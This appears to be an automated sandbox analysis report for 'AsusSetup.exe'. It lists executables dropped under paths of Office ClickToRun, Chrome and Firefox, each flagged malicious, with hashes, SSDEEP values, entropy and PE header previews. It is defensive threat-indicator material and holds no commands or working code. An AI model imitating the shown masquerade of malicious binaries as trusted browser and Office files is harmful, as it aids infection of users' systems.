                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`".....u..... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.572812014653155
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:XALuzDKnxCp3JKNrPJzruaI6HMaJTtGbI7wRGpj3:QaGg3cFPIaI6HMaJTtGbUF9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:736F3A1616794E6E711955FDF59C90E9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DFE5B333B2B00D245B0957D4B030BEF1E5D69AC9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F0C867326019B70917CA8972D6808328C629CDE9C71503BF821628E64F77D6FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB6EEED217C0D56FD24ED21DB8D61610B7454B1B5C274B9D23BC4457B1AC0E3B004BC0CA2F4948B89372AB5746623DE0486178E406E532B53C50244557779202
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1468416
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.895091251277158
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:SXr/SV0xWO/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KNxXLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:270F10D6077F5E360ADABACDEC49CE6C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DF2B418AB71EE0E9B2E8B8EE8DA7B1329754DF9D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1C285F7355FD502E35395A6B7B4719A6FC4AC3E66816BB3B32556B4F46FF04D4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8534FAA52D2CC1B281A29948C6C225EBC1CECF0A5D8D73D4B16C6B14BDB964C9A604147D5108463C5FA6D258501E7F4C423C1D7E336F98519B477C75B443339E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!......h........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.248208731348386
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:4hRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOwF9:4hRCpGpMJMrbp8JjpNdNlc5r9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:502AB212888FBBE3955BE8FDA68091FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:297F50A2C2C99C8EB37D646129456E756A60E793
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CBB4A6D03794A2675B21D7C74C16A03C95446A6223B59E3D2AA699D7D1449736
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1C37106AD03172635B39167CBC3C42619673CFCB7BE238C9F750E5646E8DF0393A7D1F6A040B23F7369204D0EE13087BA9D757576399C63A3AD5399901241616
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.....................................T.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.784027951570186
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:U83pZ3kd0CuEeN0LUmRXzYs65msLNiXicJFFRGNzj3:YKuUQY15j7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D8718EE583C70B88B35ADFC2ADC54F92
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AE9CBA274315AC31526F3A6B6772985B0CBA178D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AF3E2DB2B888CA98CE3C5FCC5EB204548DA2C1E863C9A04C9120B75B9F1789FB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:53770E95F88593B75A1BF8633A7BCE56A20354931ABC55206C3E1CD094AB5578B62B580A0C44A777723B12C72CC561BE38E08D9C95D8F84CEF1E1FCF103D1ED5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......:"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.668992143913936
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:aErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Mq:0A4oGlcR+glEdOPKzgVZu7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:639F2A1B0C95DB2D0EF8FC276BEB9ACA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DB85E2634F1885898F181C9E58F8405DAD9F8967
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:774A80FDB918020A298B20656C2101F4FD50C39646023AA6083A10BB203DCDEA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CF6A5C72792C8A471FEED8B3DA5F775F3DC3E6D86291BE3DDB571A0F3165B72B728D6BD156C2058338A61686E12C092A8E5AABE2B239794049D577C2BA417A1A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.828106381123198
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:58ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKh:Uv2gM+qwXLg7pPgw/DSZHc7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E02BE95F794F340E1AAA87B00C4203C0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CCA2A83D2CF587A143D453D6D7B35D0CDDD5C22A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:891A90C2AE7E6DB0F2ACAB90048B6C9FD0A38B89001EE5AC95387634C515CC43
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:02592E3AF2CB48A52AC2F67074890576C315CB9BB5C9C30746BE3F7AEB52960EBB6E360E7CDF97581852CBA032220642020CB60908F54E1EF32D177D7128F6A3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....S.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.828108896300621
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:u8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKh:Nv2gM+qwXLg7pPgw/DSZHc7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3144D6FAFF0803C85E4B41C99F27D715
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BB8D05422A0490A65A03BC0BE0AA2171F3883E17
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F3DA469AC839C126FA1EFA7196BCC720565C954D657167F2D7D135F11CF57746
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5D1DF606176BE4E475BEF00804BF40B5DBB4E85EA38AAC33B70564A499733DBFD2A4C8B49DA3E0F5E7D72D44D76D6D0FDC369389A6F17C769226A6C38EF8B12A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.949146993959025
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:AtjqL8fH+8aUbp8D/8+xyWAL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sjKK+81FI/8zdLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A67929D74E5EED4A75BA1338ACE743FE
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5C8DCEAAE12CAFBA4F783ED12FC90363EA203F98
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F5B0A2AFCDE5E7D31AA6DCFF95954D6057BA402116548AF18127E3F217F0AA46
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:92335B10E263FD5A8CADCAA37AF99858835E670DB0EE0031145CB14642B3DDBEF65A1E8499A050D71F2CEFD96076DDFB7AA44166400D61DCC696D3356FF965F9
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......G!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.0287692938953565
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:nAMsOu3JfCIGnZuTodRFYKBrFDbWpcLNiXicJFFRGNzj3:nAMa38ZuTSt7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3E0486920CCFA7AF38AC27EABFAA2D4C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E8A998E1BD21DE9CBC34E7D0C6995C42588CFC0C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B155C76DE2842E7F7A4389860AC515F41FF96228E7B170C8BE4F89A7E3BAE038
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:67FCE2D2554F7E8A9A89D90F1D7588E7ADF4F05068500C0100E68B7370FE9CE37EE698DAEDD0E5A6B0CB1725371629E9720B1FC15407F09261B35B1E2845EF46
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.099954677338449
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:gSK7Fhslq2EPfOGEaLNiXicJFFRGNzj3:po2cOa7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2A65F563F90552CFC1CEF18B3E1811C0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0BB55503D97D24FB784FD8734ECA804C516F72B0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:651C115E2EBC28B08ADCC8CD2163D449059D3674D4B729105B192EB092C3AD29
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E24408C4D442C05A22455D7C4B2A39019D1FB1FD706B8A7C573A0EE6E65626F9EBA2E1143CD4826625278AD668FC10E36F9AA3DD779AE4A3767EADE5E945113
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.153176060977831
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:Hv7e0j31mD+/wDGbQLNiXicJFFRGNzj3:PDj1mkQ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:187C330472AF33274B14D11E0FC2A673
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BA8CB51BA0C69E3BCCB0C5065DCCFEBADA10CDF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B683D78EF25A96CF50912A1DF737BF690E834B3F96CA517B2A069839836C10C5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9ADEDAE7E0367EC94982FEBB663C7DFE72159986B2D4A9F254F1E926FA5AF31035FF9549D4E130A22A715184C732E1ADC0AD555C4433832A30FCF1D510F2876A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1533952
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9367367180648545
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:i6hSs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:i+LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BB99677EE27AC21D6E788AED570327C8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3C945F9EDEFA85A4FA9F70C1A792EB53C3CBB0DB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:284842C9722262E097697971D8BDB19F1C98F71F5D40D1C19A09CF599F5C2734
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FCB0EAFACD33142A49712D9AE43238959E8FFC0B246A1DC37F295C31072441DA7A3FC0079210DAD1BE81AB2CC890DC61330DB68CCF4213FFBA6AC8F0F494AF9B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................."........... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.216802506436986
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:asFfc1VyFn5UQn652bO4HP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:asFcIn5rJ5LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:867007226049A2925F5093A5FF01EA22
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6A25565D3D9D4A6A93D9EB63FCAEA4C1B6D1D091
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AD9ED9B07CAC969093E41CE17F5C1E8C5422311F4877E4626C1FFCD4F4B563C5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D91F285498320AB0483C696EF4A5012C342CF102F5945389710584CC35F49F7EEE6B71EDC376ACA9CD0ED69D4071D323524981892093DD25B823DDF5CBAE9109
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.488103569558917
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:vt9o6p4xQbiKI69wpemIwpel94/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vt9faQbtl2peapeliLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9C30547B6B14FC4133767439AB607795
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3417A2FA1756008F6466100BE1353C82C8412CC0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B70411CAE2C04B8A84CBC6DADEFA1B6B683D373154FD6AB6B51CE0036FF036B9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB5057C19AA53913BAD1030DA04F71D3C6C98D0335E08FF63391C258249459FB50D1FFA51A2D3124C100A2EEE8D747839A4F11D870C1DC975CD8DD6B7552E022
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
